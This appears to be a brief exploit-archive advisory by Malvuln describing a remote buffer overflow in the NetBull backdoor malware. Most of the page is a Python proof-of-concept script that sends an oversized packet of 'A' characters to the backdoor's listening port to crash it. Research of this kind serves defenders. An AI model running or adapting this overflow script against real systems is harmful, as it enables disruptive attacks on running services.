Backdoor.Win32.NetBull.11.a Remote Buffer Overflow

Backdoor.Win32.NetBull.11.a malware suffers from a remote buffer overflow vulnerability.

Exploit/PoC:

from socket import *

MALWARE_HOST="x.x.x.x"
PORT=23444

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PACKET="A"*666

    s.send(PACKET)
    s.close()
    print("Backdoor.Win32.NetBull.11.a / Remote Buffer Overflow");
    print("MD5: 80e98fdf726a3e727f3414bdbf2e86bb");
    print("By Malvuln");

if __name__=="__main__":
    doit()

Exploit

Remote Stack Buffer Overflow

Email-Worm.Win32.Agent.gi Remote Stack Buffer Overflow Previous

Inteno IOPSYS 3.16.4 Root Filesystem Access Next